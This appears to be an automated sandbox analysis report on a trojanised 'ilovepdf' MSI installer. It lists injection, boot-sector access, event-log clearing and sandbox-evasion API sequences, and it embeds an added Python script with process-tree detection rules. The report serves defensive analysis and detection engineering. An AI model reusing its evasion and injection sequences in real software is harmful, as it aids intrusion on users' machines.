Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,13_2_04EC3710
Source: 6rfyiAq0nM | Joe Sandbox Cloud Basic: Detection: clean, Score: 0
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004AF9F0 FindResourceW,SizeofResource,LoadResource,LockResource,10_2_004AF9F0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | File created: C:\Program Files (x86)\ilovepdf
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: 6rfyiAq0nM.msi | Virustotal: Detection: 31%
Source: 6rfyiAq0nM.msi | ReversingLabs: Detection: 35%
Source: C:\Windows\Installer\MSIFBC3.tmp | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'
Source: unknown | Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSIFBC3.tmp C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Windows\Installer\MSIFBC3.tmp | Process created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp 'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k SystemNetworkService
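The process tree above (msiexec → C:\Windows\Installer\MSIFBC3.tmp → the Inno Setup stage in is-OOL1B.tmp → a case-mangled rundll32 loading sqlite.dll from Program Files with export `global` → svchost.exe started by another svchost.exe) is what a detection engineer would want to catch from process-creation telemetry rather than from sandbox signatures. The script below is an added example, not a Joe Sandbox or Sigma artefact; it runs three rules over Sysmon-style records (Image, CommandLine, ParentImage) that are constructed from the report's "Process created" lines. The first msiexec's parent is reported as unknown and is assumed to be explorer.exe here, the list of acceptable rundll32 spellings and the services.exe-only parent allow-list are assumptions, and the benign svchost record is added for contrast.

```python
"""
Process-tree detection rules over constructed Sysmon-style events.
Added example modelled on the report's process tree; records are not copied
telemetry, the first parent is assumed, and the allow-lists are assumptions.
"""
import re
from typing import Dict, List

Event = Dict[str, str]

EVENTS: List[Event] = [
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\6rfyiAq0nM.msi'",
     "ParentImage": r"C:\Windows\explorer.exe"},                       # assumed parent
    {"Image": r"C:\Windows\Installer\MSIFBC3.tmp",
     "CommandLine": r"C:\Windows\Installer\MSIFBC3.tmp",
     "ParentImage": r"C:\Windows\System32\msiexec.exe"},
    {"Image": r"C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp",
     "CommandLine": r"'C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp' /SL5='$9025C,6374824,780800,C:\Windows\Installer\MSIFBC3.tmp'",
     "ParentImage": r"C:\Windows\Installer\MSIFBC3.tmp"},
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r"'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k SystemNetworkService",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    # Constructed benign service host for contrast; must yield no finding.
    {"Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]

# Quoted token plus any unquoted tail, so 'x.dll',export stays one argument.
_TOKEN = re.compile(r"""'[^']*'\S*|"[^"]*"\S*|\S+""")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
RUNDLL32_SPELLINGS = {"rundll32.exe", "RUNDLL32.EXE", "Rundll32.exe", "RunDll32.exe"}  # assumed


def tokens(cmdline: str) -> List[str]:
    return [t.replace("'", "").replace('"', "") for t in _TOKEN.findall(cmdline)]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def rule_tmp_exec(ev: Event) -> List[dict]:
    """Executable run from a .tmp name (MSI binary table drop, Inno stage)."""
    if basename(ev["Image"]).lower().endswith(".tmp"):
        return [{"rule": "tmp_executed", "detail": ev["Image"]}]
    return []


def rule_rundll32(ev: Event) -> List[dict]:
    """Case-mangled rundll32 spelling and DLLs loaded from outside System32."""
    if basename(ev["Image"]).lower() != "rundll32.exe":
        return []
    found = []
    toks = tokens(ev["CommandLine"])
    typed = basename(toks[0]) if toks else ""
    if typed.lower() == "rundll32.exe" and typed not in RUNDLL32_SPELLINGS:
        found.append({"rule": "rundll32_case_mangled", "detail": typed})
    if len(toks) > 1:
        dll, _, export = toks[1].rpartition(",")
        if dll and not dll.lower().startswith(SYSTEM_DIRS):
            found.append({"rule": "rundll32_nonsystem_dll", "detail": f"{dll}!{export}"})
    return found


def rule_svchost(ev: Event) -> List[dict]:
    """svchost.exe whose parent is not the service control manager."""
    if (basename(ev["Image"]).lower() == "svchost.exe"
            and basename(ev["ParentImage"]).lower() != "services.exe"):
        return [{"rule": "svchost_unusual_parent", "detail": ev["ParentImage"]}]
    return []


def run_rules(events: List[Event]) -> List[dict]:
    findings = []
    for ev in events:
        for rule in (rule_tmp_exec, rule_rundll32, rule_svchost):
            for f in rule(ev):
                f["image"] = ev["Image"]
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in run_rules(EVENTS):
        print(f"{f['rule']:24s} {f['image']}  ({f['detail']})")
```

The `tmp_executed` rule fires on legitimate MSI custom actions too and is only a correlation aid; the rundll32 and svchost rules are the ones worth alerting on, and on this tree they fire on the same chain within seconds of each other.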
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,10_2_004AF110
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ECAA70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,13_2_04ECAA70
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EDA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,14_2_0000024B7D0EDA60
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,16_2_0000012E1788DA60
Source: C:\Windows\System32\svchost.exe | Code function: 17_2_00000204F339DA60 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,17_2_00000204F339DA60
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\TEMP\~DFAE8A96F5E4660E33.TMP
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_0062C764 GetVersion,CoCreateInstance,11_2_0062C764
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0041A4DC GetDiskFreeSpaceW,10_2_0041A4DC
Source: svchost.exe | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: svchost.exe | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: svchost.exe | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: svchost.exe, 00000010.00000002.829801216.0000012E19820000.00000040.00000001.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,13_2_04EC5C60
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdLl32.Exe' 'C:\Program Files (x86)\ilovepdf\sqlite.dll',global
Source: 6rfyiAq0nM.msi | Static file information: TRID: Microsoft Windows Installer (77509/1) 90.59%
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Window found: window name: TMainForm
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Automated click: Next
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: 6rfyiAq0nM.msi | Static file information: File size 7306752 > 1048576
Source: Binary string: 2"j.pdb source: is-30MA7.tmp.11.dr
Source: Binary string: .pdbYH source: is-UKPSI.tmp.11.dr
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004B5000 push 004B50DEh; ret 10_2_004B50D6
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004B5980 push 004B5A48h; ret 10_2_004B5A40
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00458000 push ecx; mov dword ptr [esp], ecx 10_2_00458005
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0049B03C push ecx; mov dword ptr [esp], edx 10_2_0049B03D
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004A00F8 push ecx; mov dword ptr [esp], edx 10_2_004A00F9
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_00458084 push ecx; mov dword ptr [esp], ecx 10_2_00458089
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004B1084 push 004B10ECh; ret 10_2_004B10E4
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004A1094 push ecx; mov dword ptr [esp], edx 10_2_004A1095
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0041A0B4 push ecx; mov dword ptr [esp], ecx10_2_0041A0B8
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004270BC push 00427104h; ret 10_2_004270FC
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458108 push ecx; mov dword ptr [esp], ecx10_2_0045810D
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004321C8 push ecx; mov dword ptr [esp], edx10_2_004321C9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A21D8 push ecx; mov dword ptr [esp], edx10_2_004A21D9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049E1B8 push ecx; mov dword ptr [esp], edx10_2_0049E1B9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049A260 push 0049A378h; ret 10_2_0049A370
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00455268 push ecx; mov dword ptr [esp], ecx10_2_0045526C
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004252D4 push ecx; mov dword ptr [esp], eax10_2_004252D9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004592FC push ecx; mov dword ptr [esp], edx10_2_004592FD
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0045B284 push ecx; mov dword ptr [esp], edx10_2_0045B285
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00430358 push ecx; mov dword ptr [esp], eax10_2_00430359
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00430370 push ecx; mov dword ptr [esp], eax10_2_00430371
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00459394 push ecx; mov dword ptr [esp], ecx10_2_00459398
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A1428 push ecx; mov dword ptr [esp], edx10_2_004A1429
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0049B424 push ecx; mov dword ptr [esp], edx10_2_0049B425
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004A24D8 push ecx; mov dword ptr [esp], edx10_2_004A24D9
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004224F0 push 004225F4h; ret 10_2_004225EC
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004304F0 push ecx; mov dword ptr [esp], eax10_2_004304F1
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00499490 push ecx; mov dword ptr [esp], edx10_2_00499493
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458564 push ecx; mov dword ptr [esp], edx10_2_00458565
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00458574 push ecx; mov dword ptr [esp], edx10_2_00458575
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_00457574 push ecx; mov dword ptr [esp], ecx10_2_00457578
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,13_2_04EC8FD0
Source: MSIFBC3.tmp.2.drStatic PE information: section name: .didata
Source: MSIFBC3.tmp.10.drStatic PE information: section name: .didata
Source: is-JDQA9.tmp.11.drStatic PE information: section name: .didata
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows\System32\msiexec.exe Executable created and started: C:\Windows\Installer\MSIFBC3.tmp
Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0 13_2_04EC6740
Source: C:\Windows\System32\svchost.exe Code function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0 16_2_0000012E17889FB0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\is-30MA7.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dll
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFBC3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\ti.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\sqlite.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\th.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\tt.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)
Source: C:\Windows\Installer\MSIFBC3.tmp File created: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmp
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIFBC3.tmp

Boot Survival:

Contains functionality to infect the boot sector
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetModuleHandleA,GetProcAddress,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0 13_2_04EC6740
Source: C:\Windows\System32\svchost.exe Code function: GetModuleHandleA,GetProcAddress,GetSystemFirmwareTable,GetSystemFirmwareTable,CreateFileA,DeviceIoControl,CloseHandle, \\.\PhysicalDrive0 16_2_0000012E17889FB0
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ilovepdf.lnk
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC3710 OpenSCManagerW,OpenServiceW,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 13_2_04EC3710
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_006A52B8 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,SetActiveWindow, 11_2_006A52B8
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Code function: 11_2_005C7E30 IsIconic,GetWindowLongW,GetWindowLongW,GetActiveWindow,MessageBoxW,SetActiveWindow, 11_2_005C7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EBA010 ClearEventLogW,OpenEventLogA,ClearEventLogW,CloseEventLog, 13_2_04EBA010
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5HQ15BTC-BI2Q-S1J7-YRC6-SZJY3C3CP8J7}\650478DC7424C37C 1
Source: C:\Windows\System32\svchost.exe Registry key monitored for changes: HKEY_USERS.DEFAULT\Control Panel\International
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\Installer\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Query firmware table information (likely to detect VMs)
Source: C:\Windows\System32\svchost.exe System information queried: FirmwareTableInformation
Contains functionality to compare user and computer (likely to detect sandboxes)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,StrStrIW,CreateThread,CreateThread,CloseHandle,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 13_2_04ECC0A0
Source: C:\Windows\System32\svchost.exe Code function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle, 14_2_0000024B7D0EF5E0
Source: C:\Windows\System32\svchost.exe Code function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle, 16_2_0000012E1788F5E0
Source: C:\Windows\System32\svchost.exe Code function: GetCommandLineW,GetModuleFileNameW,lstrcmpiW,StrStrIW,CreateThread,CloseHandle,FindCloseChangeNotification,CreateThread,CloseHandle,StrStrIW,CreateThread,WaitForSingleObject,CloseHandle,StrStrIW,Sleep,CreateThread,WaitForSingleObject,CloseHandle,InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetCloseHandle, 17_2_00000204F339F5E0
Contains functionality to detect sleep reduction / modifications
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EB3C30 13_2_04EB3C30
Source: C:\Windows\System32\svchost.exe Code function: 14_2_0000024B7D0D4410 14_2_0000024B7D0D4410
Source: C:\Windows\System32\svchost.exe Code function: 16_2_0000012E17874410 16_2_0000012E17874410
